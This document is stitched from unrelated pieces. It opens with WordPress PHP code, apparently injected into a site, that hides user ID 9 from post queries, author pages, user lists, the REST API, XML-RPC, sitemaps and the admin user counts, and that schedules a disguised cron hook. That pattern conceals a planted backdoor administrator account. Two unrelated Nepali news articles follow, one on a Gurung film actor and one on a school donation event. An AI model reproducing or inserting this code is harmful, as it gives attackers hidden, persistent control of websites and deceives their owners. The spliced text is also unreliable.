add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
स्कुल पढ्दादेखि नै विद्यालय तथा अन्य संघ संस्थाको आयोजनामा हुने कार्यक्रमहरूमा नृत्य गर्दै आएका गुरुङले २१ वर्षकै उमेरमा गुरुङ भाषाको ६ वटा चलचित्रमा अभिनय गरिसकेका छन् । मुख्य नायकको रुपमा ६ वटा चलचित्रमा अभिनय गरिसकेका गुरुङले झण्डै ७० वटा म्युजिक भिडियोमा मोडलिङ गरेर उनले चर्चाको शिखर चुम्न सफल भएका हुन् । २०७५ सालमा कक्षा ११ अध्ययन गर्दै गर्दा जनक गुरुङको निर्देशनमा बनेको आमाको मन नामक नेपाली भाषाको गुरुङ चलचित्रबाट उनले डेब्यु सुरु गरेका हुन् । त्यसपछि उनले क्रमशः एकपछि अर्को चलचित्र र म्युजिक भिडियोमा काम गर्ने अवसर पाएका हुन् ।
२०५९ साल फागुन २५ गते जन्मिएका २०७४ सालमा गाउँकै श्रीसेवा सदन माविबाट एसइई परीक्षा उत्तीर्ण गरेपछि उच्च शिक्षा लमजुङ पढ्न लमजुङकै सदरमुकाम बेसीशहरको अर्थ्ली प्याराडाइज बोर्डिङ स्कुलमा भर्ना भए । उनले जिल्लामा आयोजना हुने नृत्य प्रतियोगितामा सक्रियताका साथ भाग लिन सुरु गरे । उनले लमजुङ टेलिभिजनले सञ्चालन गरेको रियालिटी सो लमजुङ डान्स च्याम्पसिजन टु मा अडिसन दिएका थिए । पहिलो अडिसनमा छनौट भएका गुरुङले निर्णायकको राम्रो प्रतिक्रिया पाए । त्यस बखत निर्णायक केदार बोहरा र विष्णु घलेले गुरुङको खुलेर प्रशंसा गरेको उनको स्मरणमा ताजै छ । त्यतिमात्र हैन, उहाँहरूले नै गुरुङ चलचित्रको नायक भन्दा कम नभएको भन्दै भोलिका दिनमा तिमी एउटा राम्रो कलाकारको रुपमा स्थापित हुन्छौ भनेको समेत बिर्सिएका छैनन् । उनलाई यस क्षेत्रमा लाग्न उनलाई आमा मोतीमाया गुरुङ र बुवा डम्बर गुरुङको राम्रो साथ सहयोग रहेको छ ।
संयोग मान्नु पर्छ, त्यही रियालिटी सोपश्चात् उनलाई गुरुङ चलचित्रमा अफर आएको थियो । त्यसपछि उनले निरन्तर चलचित्र र म्युजिक भिडियोमा आफूलाई उभ्याउँदै आएका छन् । उनले सुरुवातको समयमा केही म्युजिक भिडियोहरूमा कोरस नृत्यसमेत गरेका थिए ।
‘आमाको मन’बाट डेब्यु सुरु गरेका गुरुङले हालसम्म गुरुङ चलचित्र दिदी बहिनी, ङोल्स्यो माया, पूर्णिमा, सम्बन्धको डोरी, मेरो इच्छामा अभिनय गरिसकेका छन् । गुरुङले विशेष गरी गाउँ चिनारी, सालैजो, कौडा, झ्याउरे र गुरुङ भाषको गीतमा आफ्नो उत्कृष्ट नृत्य र अभिनय गरेका छन् । उनले निकट भविष्यमा बन्न लागेको कुलदेउता र अर्को एक चलचित्रका लागि सम्झौता समेत गरिसकेको बताए । गुरुङले हालसम्म गरेका करिव ७० म्युजिक भिडियो मध्ये चलेछ्याबा, परदेशी, अमिलो कागती, ताँजे गाउँ चिनारी, क्यों बिना, डाँडापारी हिमाललगायतका म्युजिक भिडियोलाई स्रोता दर्शकले अत्यधिक मन पराइएका छन् ।
अभिनयकै क्रममा गुरुङले झण्डै आधादर्जन अवार्डसमेत जितेका छन् । उनले आदिम कलामञ्च अवार्ड, गुरुङ फिल्म एशोसिशन नेपाल जिफान, सुभेक्षा फिल्म नेपाल, स्वस्ति फिल्म अवार्डबाट बेस्ट एक्टर र परफरमेन्स उपाधिसहित अवार्ड जितेका हुन् ।
गुरुङ समुदायमा जन्मिएको हुनाले ठूलो भएपछि लाहुरे बन्ने, लाहुरे बन्न नसके विदेश पलायन हुने सोच बनाएका गुरुङले अहिले आफ्नै देशको कला क्षेत्रमा भविष्य देख्न थालेका छन् । आफूले गरेको कामप्रति एकदमै सन्तुष्टि मिल्ने गरेको गुरुङले सुनाए । उनले राम्रो कथावस्तु भएको प्रोजेक्टमा जोडिएर कामगर्ने इच्छा भएको भन्दै कथावस्तु राम्रो नलागेकै कारण आफूले कतिपय चलचित्रलाई रिजेक्ट गर्ने गरेको बताएका छन् ।
गुरुङ चलचित्र र म्युजिक भिडियोमा छुट्टै पहिचान बनाउन सफल गुरुङको अब ठूलो पर्दामा देखिने गरी नेपाली चलचित्र खेल्ने ठूलो चाहना छ । त्यसका लागि उनले आँफूलाई निखार्न र तिखार्नको लागि निकै कडा मेहनत र परिश्रम गरिरहेको बताएका छन् ।
– अनुज अधिकारीका सहयोगमा ।
]]>उपकार फाउन्डेसन नेपालको आयोजनामा मङ्गलबार फेदीखोला गाउँपालिका, वडा नम्बर २ स्थित महेन्द्र जनसहयोग आधारभूत विद्यालयमा भएको कार्यक्रममा पर्वतारोही तथा समाजसेवी जापानी नागरिक नोगुची केनले पिक एड, केन नोगुचिज फाउन्डेसन, (PEAK AID, Ken Noguchi’s) जापानको आर्थिक सहयोगमा सोही विद्यालयको पुस्तकालयका लागि पुस्तक तथा अन्य छिमेकी विद्यालयहरूलाई शैक्षणिक सामग्री हस्तान्तरण गरेका हुन् । महेन्द्र जनसहयोगसँगै शिवालय आधारभूत विद्यालय, खहरे आधारभूत विद्यालय, कालाभैरव माध्यमिक विद्यालय र अमोर बालगृहलाई शैक्षिक सामाग्री वितरण गरिएको थियो ।
सोही कार्यक्रममा फेदीखोला-२, खहरे निवासी क्यान्सर रोगबाट पीडित भई भारतको नयाँ दिल्लीमा उपचाररत पूजा अधिकारी कार्कीलाई नगद १० हजार रुपियाँसमेत प्रदान गरिएको थियो । विद्यालयमा नि:शुल्क जग्गा दान गरी विद्यालयको नाममा जग्गा धनी प्रमाणपूर्जा बनाइदिएका समाजसेवी, फेदीखोला साना किसान कृषि सहकारी संस्था लि. का अध्यक्ष नेत्रबहादुर कार्कीलाई सम्मानसमेत गरिएको थियो ।
उपकार फाउन्डेसन, नेपालका अध्यक्ष बलबहादुर गोदारको अध्यक्षतामा भएको कार्यक्रममा प्रमुख अतिथि फेदीखोला गाउँपालिका वडा नं.२ का अध्यक्ष अविलास गुरुङले पर्वतारोही, समाजसेवी तथा शिक्षा प्रेमी केन नोगुची जस्ता महान् दाताहरूको सहयोगले नेपालको ग्रामीण विकासमा टेवा पुगेको बताए । फेदीखोला गाउँपालिकाका शिक्षा शाखा प्रमुख रामचन्द्र गुरुङले विगत ६/७ वर्षदेखि यस क्षेत्रमा नोगुचीको अमूल्य देन रहेको स्मरण गरे । समाजसेवी तथा सम्मानित व्यक्तित्व नेत्रबहादुर कार्कीले समाजमा महत्त्वपूर्ण योगदान पुर्याउने व्यक्तिलाई विद्यालयबाट टाढा राख्न नहुने बताए । सामाजिक अभियन्ता, समाजसेवी तथा साहित्यकार लाल कार्की ‘अन्जान’ले नोगुची र उपकार नेपाल जस्ता समाजसेवी भएमा कोही निरक्षर हुनुनपर्ने बताउँदै उपकारको परोपकारी मनको प्रशंसा गर्दै एउटा गजल समेत सुनाए । शिक्षक पार्वती कार्कीको सञ्चालनमा भएको कार्यक्रममा शिक्षक गोदार उपमाले स्वागत गरेकी थिइन् भने शिवकुमार गौतम र चित्रबहादुर कार्कीले सहयोग रकम थप र निरन्तर गर्नुपर्ने भनाइ राखेका थिए ।
]]>


